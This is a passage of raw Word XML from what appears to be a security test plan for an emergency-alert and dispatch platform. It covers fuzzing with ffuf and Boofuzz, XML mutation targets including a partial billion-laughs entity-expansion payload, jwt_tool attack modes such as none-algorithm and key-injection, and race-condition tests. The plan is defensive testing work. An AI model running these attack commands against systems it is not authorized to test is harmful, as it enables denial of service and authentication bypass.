                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ULID timestamp component analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FIPS routing in CAP ingest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Auto-routing could deliver alerts to wrong agency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Crafted FIPS codes in CAP XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DDB condition expression bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Idempotency check can be bypassed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5400"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Race condition on write-back submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing sends malformed, random, or boundary-condition inputs to find crashes, hangs, or unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">REST API Endpoint Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># ffuf — discover hidden endpoints and parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u https://api-staging.rapidcortex.us/FUZZ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Authorization: Bearer {token}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -mc 200,201,202,400,401,403,500 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -o ffuf-results.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP XML Fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Boofuzz — network protocol fuzzer, adapts to HTTP+XML body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install boofuzz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Key mutation targets for cap-parser.ts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. CDATA sections with special characters: &lt;![CDATA[&lt;injection&gt;]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. Deeply nested XML: 10,000+ levels of nested elements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. Billion laughs attack: XML entity expansion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    &lt;?xml version='1.0'?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    &lt;!DOCTYPE lolz [&lt;!ENTITY lol 'lol'&gt;&lt;!ENTITY lol2 '&amp;lol;&amp;lol;...'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. Unicode edge cases in identifier, sender, and description fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 5. Null bytes in string fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 6. Extremely long strings (&gt;1MB) in headline and description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Boundary Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># jwt_tool — test all known JWT attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X a    # algorithm confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X n    # none algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X s    # JWKS spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X k    # key injection via kid header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -T      # tamper mode — edit claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Race Condition Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use Burp Suite Turbo Intruder to send parallel requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test: two dispatchers submit write-back for the same incident simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: only one succeeds, second gets a clear error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test: two users request Ring OAuth at the same millisecond</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: saveOAuthState upsert handles this cleanly — no conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test: QR code scan count increment under 100 concurrent scans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: DDB atomic ADD operation — final count exactly 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Code Review Focus Areas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any code that constructs a string and passes it to exec(), eval(), or shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any custom serialization/deserialization logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any place where user input influences a DynamoDB key or filter expression</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any auth check that uses OR instead of AND logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any try/catch that silently swallows security-relevant exceptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any place where a default value could grant broader access than intended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
